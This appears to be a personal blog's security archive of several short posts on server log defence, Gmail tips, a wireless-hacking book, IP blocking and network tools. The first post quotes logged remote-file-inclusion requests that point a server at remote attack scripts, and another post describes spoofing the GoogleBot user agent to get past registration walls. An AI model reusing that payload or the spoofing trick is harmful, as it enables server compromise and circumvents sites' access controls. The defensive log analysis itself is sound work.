Archive for category Information Security

How to frustrate a trojan bot script

While doing some regular maintance on some websites I manage, I came across some interesting entries in the logs for one of our servers. Hundreds and hundreds of the following types of requests, originating from a wide variety of IP's:

GET /modules.php?op=http://cherrygirl.h18.ru/images/cs.txt?
GET /modules.php?op=http://amyru.h18.ru/images/cs.txt? 

Basically, there are a bunch of 'infected' web servers out there which are trying to get our server to execute code stored in a file on a remote server. The file in the cases above is named 'cs.txt'. You can see the contents of the script/file by reading Dan Langille's sanitized version of the attack script.

While our server was not vulnerable to the attack, I was getting very annoyed with having to respond to the script each time it hit our server with a request. Our server had to run some code, determine that the page didn't exist, produce a page that a normal user would see explaining why their request could not be completed, etc. Then it hit me. Why are we spending all this precious cpu time for these attackers? Why not have them waste their own cpu time? And that's when I decided that the attack script should attack itself. In simple terms, when our web server notices an attack coming in, it simply redirects the request to the originating server. In essence, it's like requesting a webpage from a server, being told that the page has moved and be given a new address to go to. In this case, the new address is http://127.0.0.1. Without getting too technical, that's called a Loopback Address and is a network standard which always points to yourself.

Here's what I put in the Apache webserver httpd.conf file, which is the configuration file for the Apache web server on the Linux server I wanted to modify:

RewriteEngine on
RewriteCond %{QUERY_STRING} cs.txt? [NC]
RewriteRule ^.*$ http://127.0.0.1 [R=301,L]

So now, whenever a request comes in which contains the string 'cs.txt?' in the URL request, I inform the requester that the file they are requesting has been permanently moved to 'http://127.0.0.1', the loopback address and in essence, itself.

While the hits on the server continue, I have noticed they have slowed down, I'm assuming because the remote server is busy talking to itself for a moment. I also have the satisfaction of knowing our server isn't wasting its time with these trojan hits, and letting them talk to themselves for a bit instead. 

No Comments

Need to rebuild your computer? Have all your keys?

Encryption KeysI was chatting with a friend this morning when he mentioned to me that he spent part of his weekend rebuilding one of his home computers. He indicated that he was reluctant doing some of the cleanup work because he wasn’t sure where he had packed all his legally purchased software keys; he moved to a new home a couple weeks ago and he has boxes scattered all over the place. I immediately brought up a little tool I have used in the past that has more than once get me out of such a bind. Take a look at the Magical Jelly Bean Keyfinder. Make sure you pickup the Beta version, since the stable version is a little outdated and will not detect keys for Office 2003.

1 Comment

Access Websites Without Registering

Google LogoEver run a search on Google for some information you were interested in, only to find that after you click on a result you are taken to a site which required registration in order to access the full article? I sure did, on many occasions. Ever wonder how Google was able to index something that can only be accessed by registered users? That thought occurred to me on my ride home today as I was listening to some podcasts. I do some of my best thinking while driving and listening to something totally unrelated to the problem I’m trying to solve. And that’s when it struck me…

There’s no way that the Google bot happened to have ‘registered’ an account on some of these sites and thus had access. Even if it did, the bot just follows links, albeit in an intelligent manner. So, it had to be something else. And that’s when it hit me; the Google bot has a unique browser ‘User Agent’. When one of these sites sees that Google is spidering their pages, they just give it free reign to all their content. After all, it’s important to get as much of their content indexed, and as such, get more people directed to their website from search results. When you and I go to the same site, our browser transmits a User Agent header indicating if we’re using Firefox or IE or another browser.

I decided to test my theory tonight. I fired up my Firefox browser and grabbed an extension which would enable me to customize my User Agent value. I downloaded the “User Agent Switcher” Firefox extension, set my User Agent to “GoogleBot/2.1” (no quotes) and I was ready to go. I needed to find a site that was indexed by Google, but that needed ‘registration’ to be able to view its content. Take the following URL for example: http://www.windowsitpro.com/Windows/Article/ArticleID/46980/
Try going to it without modifying your User Agent and you’ll notice you need to be a subscriber to have access to more than 2 paragraphs of the full article. Now, modify your User Agent and Presto! You have access to the full article!

While this won’t work with some of the larger sites like the New York Times or Washington Post, it does work with some of the smaller sites which rely more heavily on Google to route some traffic to their site. For now, anytime I hit a site which requires me to register before I can view the full article, I’ll switch my User Agent just in case. I have a strange suspicion this might work on many, many sites…

1 Comment

More Fun With GMail

GMail LogoMy friend Dan approached me at work today relating a story he had read on someone’s blog regarding some interesting GMail tips. The one he brought up was how you could take your GMail address and ‘append’ additional words to the account name. For example, if you had a GMail account of ‘nasal43087@gmail.com’, you could give out an email address of ‘nasal43087+amazon@gmail.com’ when buying something from Amazon. Now, if Amazon emailed you, you would get the email like you normally would. You could filter on the appended ‘+amazon’ to automatically move the email into a folder, but more importantly, if you were to receive an email at that ‘address’ from anyone else, you would instantly know that Amazon had given/sold your address and to whom. This would be a quick way to determine who’s selling your information off to spammers…

The GMail Tips website also has lots of other interesting tips/ideas to try out with your GMail account. The tip above was taken from their GMail Tip #5.

No Comments

Wireless Security and Hacking, Redux


Wi-Foo - More info from Amazon
I was recently given the book Wi-Foo, The Secrets of Wireless Hacking as a present for my birthday, and I have been reading it extensively for the past few days. I have been involved with wireless security for a few years now, giving security talks to members of my community and helping out friends and family stay secure while enjoying the wonderful advantages of wireless computing. Over the past couple of years, I have slowly built up a small reference library of books related to wireless technologies and security. I even got involved in a small antenna building hobby which enabled me to better understand some of the ways RF works.
Upon reading the first few chapters of this book, I realized that this tome was different. The information contained within its pages wasn’t a re-hashed compendium of information that could potentially be gathered across the internet and spoon-fed to the reader. In this case, the author brings us along as the many vulnerabilities of wireless computing are brought forward, how those vulnerabilities are exploited by nefarious individuals, and the ever-expanding variety of tools availble to assist in exploiting these vulnerabilities are described.
Don’t get the wrong idea here; this isn’t the run-of-the-mill Howto put together from various information sources freely available on the internet. The authors take painstaking efforts to explain how the various wireless encryption/security options, such as WEP, WPA, LEAP, TKIP, PSK, etc, work, and how they can be defeated. The tools are not only defined, but described in relation to how they leverage and exploit the vulnerabilities and why they work.
As you can imagine, I’m definitely going to be reading this book from cover to cover. The information within is fresh and very comprehensive. While extensive in its depth, I still believe that this is an ideal book for anyone, from beginner to expert, who has a desire to better understand wireless computing technologies, its advantages and disadvantages, and how to protect oneself from evil-doers, out to take advantage of the stealth that wireless provides.

No Comments

Blocking out IP’s from China

Sick and tired of getting spam and ‘open web proxy’ probes from IP’s originating from China? Do you do absolutely no business with anyone in China? Want to block all IP’s orginating from China and rid yourself of this issue? Take a look at http://www.okean.com/asianspamblocks.html
I actually made use of their lists in order to block some large subnet blocks which were sucking about 10-15% of my total bandwidth just through their incessant probes of my network.
And before anyone starts crying about how sad it is that I’m ‘censoring’ people from China, well too bad. I can’t afford to keep paying for an internet connection that is slowly being used up by probes originating from servers which can’t keep up with security patches. Not to mention the crazy amounts of spam originating from these IPs…

No Comments

What will I do without SamSpade.Org?

Many times a week, sometimes many times a day, I rely on being able to do some quick informational type lookups on one or more IP’s. Be it trying to find out who owns a particular server or what link between me and the box is causing me connection issues. Over the years, I have relied heavily on http://www.samspade.org for all my IP related tools. It’s a great site, with all the tools I need to get all the information I’m looking for. The added benefit is that it’s not on my network, so the results provided give me an external view of the issue, as well as providing some level of anonymity.

SamSpade has been overloaded recently; not sure what’s going on, but during some periods of time, the site is barely accessible. This has led me to look at some alternative for those times when Sam is down. That’s when I came across http://www.geektools.com

At first glance, it doesn’t look like much, but they do provide two of the tools I use the most; WHOIS and Traceroute. But here’s where things are different. You are given the choice of running your Traceroute from over a hundred sites scattered across the globe. This is great to see if an issue is a result of a down box somewhere, or a bad router.

While SamSpade still has a few extra nice tools (such as the anonymous URL browser and URL decrypter), Geektools adds that extra level of accessibility for those times when Sam isn’t available…

5 Comments

Cool Windows XP Internal System Tools

While doing some troubleshooting on my Windows XP workstation at home, I had a need to determine what network connections my computer currently was using and what processes were attached to them. Sure, I could run ‘netstat’, but that will only tell me what connections I have. If I spot anything out of the ordinary, it doesn’t tell me what ‘process’ is using that connection. That’s when I hit Google and found this gem of a site, http://www.sysinternals.com/ntw2k/utilities.shtml

The utility I actually needed was called TCPView, but the owner of this site has authored a slew of other very cool utilities, much like the ones I use everyday in a Linux environment.

Utilities like:

  • Handle – This handy command-line utility will show you what files are open by which processes, and much more.
  • RegMon – This monitoring tool lets you see all Registry activity in real-time. It works on all versions of WinNT/2K, Windows 9x/Me and Windows 64-bit.
  • Process Explorer – Find out what files, registry keys and other objects processes have open, which DLLs they have loaded, and more. This uniquely powerful utility will even show you who owns each process.

No Comments